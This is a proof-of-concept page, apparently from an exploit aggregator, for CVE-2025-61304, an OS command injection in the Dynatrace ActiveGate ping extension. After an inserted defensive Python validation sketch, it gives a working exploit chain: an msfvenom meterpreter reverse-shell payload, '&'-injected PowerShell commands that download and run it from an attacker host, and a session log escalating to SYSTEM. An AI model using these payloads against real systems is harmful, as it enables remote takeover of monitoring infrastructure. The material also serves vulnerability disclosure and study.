CVE-2025-61304 PoC — Dynatrace ActiveGate security vulnerability

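Source
Related vulnerability
Title: Dynatrace ActiveGate security vulnerability (CVE-2025-61304)
Description: Dynatrace ActiveGate is a gateway component of the monitoring platform from the US company Dynatrace. Dynatrace ActiveGate 1.016 and earlier contain a security vulnerability caused by improper handling of specially crafted IP addresses, which may lead to OS command injection.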
Description
OS command injection vulnerability in Dynatrace ActiveGate ping extension up to 1.016 via crafted ip address
Introduction
# CVE-2025-61304
"OS command injection vulnerability in Dynatrace ActiveGate ping extension up to 1.016 via crafted ip address"

In the background, the ping extension uses the Windows command prompt to perform the ping. The input field for the Test Target Host is also 1024 characters long. After the IP address you can append additional commands for the ActiveGate to execute, simply by separating them with an '&'.

Reported to Dynatrace and fixed with this commit:
https://github.com/Dynatrace/dynatrace-api/pull/99
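
As an added example (not code from this README and not Dynatrace's actual fix), the sketch below shows one way to close this class of bug: allowlist the target as an IP literal or hostname, then start `ping` from an argument list so `cmd.exe` never parses the input. The function names `is_valid_target`, `build_ping_argv` and `ping` are hypothetical.

```python
import ipaddress
import re
import subprocess

# Characters that can occur in an IP literal or DNS hostname. Shell
# metacharacters such as '&', '|', ';', spaces and quotes are all excluded.
_ALLOWED_CHARS = re.compile(r"[A-Za-z0-9.:-]+")
# RFC 1123 label: letters, digits, hyphen; no leading or trailing hyphen.
_LABEL = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)")


def is_valid_target(target: str) -> bool:
    """Return True only for an IP literal or a syntactically valid hostname."""
    if not target or len(target) > 253:
        return False
    # Character allowlist first: this also rejects IPv6 zone IDs ("%..."),
    # which ipaddress would otherwise accept with arbitrary trailing text.
    if not _ALLOWED_CHARS.fullmatch(target):
        return False
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        pass
    # Not an IP literal: every dot-separated label must be well formed.
    # The leading-hyphen rule also stops values like "-t" being read as a
    # ping option (argument injection).
    labels = target.rstrip(".").split(".")
    return all(_LABEL.fullmatch(label) for label in labels)


def build_ping_argv(target: str, count: int = 1) -> list:
    """Build the argument vector for Windows ping; raise on unsafe input."""
    if not is_valid_target(target):
        raise ValueError(f"rejected ping target: {target!r}")
    return ["ping", "-n", str(int(count)), target]


def ping(target: str) -> int:
    """Run ping directly (shell=False), so no command interpreter is involved."""
    result = subprocess.run(build_ping_argv(target), shell=False,
                            capture_output=True, timeout=30)
    return result.returncode
```

Validation and shell-free execution are independent layers: either one alone blocks the `&` chaining described above, and keeping both means a gap in the validator does not turn back into command execution.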

Exploit RCE to add user:

<img width="1261" height="957" alt="add_user" src="https://github.com/user-attachments/assets/acbfdc73-fe90-4c29-b106-70a283695230" />

Local user list before and after:

<img width="1274" height="746" alt="exploit" src="https://github.com/user-attachments/assets/344948ae-08d6-431c-9101-aa0be2633998" />

# Other example payloads: 

1. Create a meterpreter reverse shell:
```
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.51.200 LPORT=4444 -f exe > mshell.exe
```

2. Download and Execute the shell on the ActiveGate through the Cloud interface using the ping extension:
```
google&powershell.exe $ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest http://192.168.51.200/mshell.exe -OutFile c:\test\mshell.exe

google&c:\test\mshell.exe

```

3. Resulting session
```
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.51.200:4444 

[*] Sending stage (200262 bytes) to 192.168.51.54
[*] Meterpreter session 3 opened (192.168.51.200:4444 -> 192.168.51.54:49800 ) at 2023-01-21 19:02:16 +0100

meterpreter > getuid
Server username: NT AUTHORITY\LOCAL SERVICE
meterpreter > getsystem 
...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > sysinfo
Computer        : WIN-9493M3CRTDV
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
```
File snapshot

[4.0K] /data/pocs/d5f190eb8be8a4cf85d050d4c8f4415706de1e4f └── [2.1K] README.md 1 directory, 1 file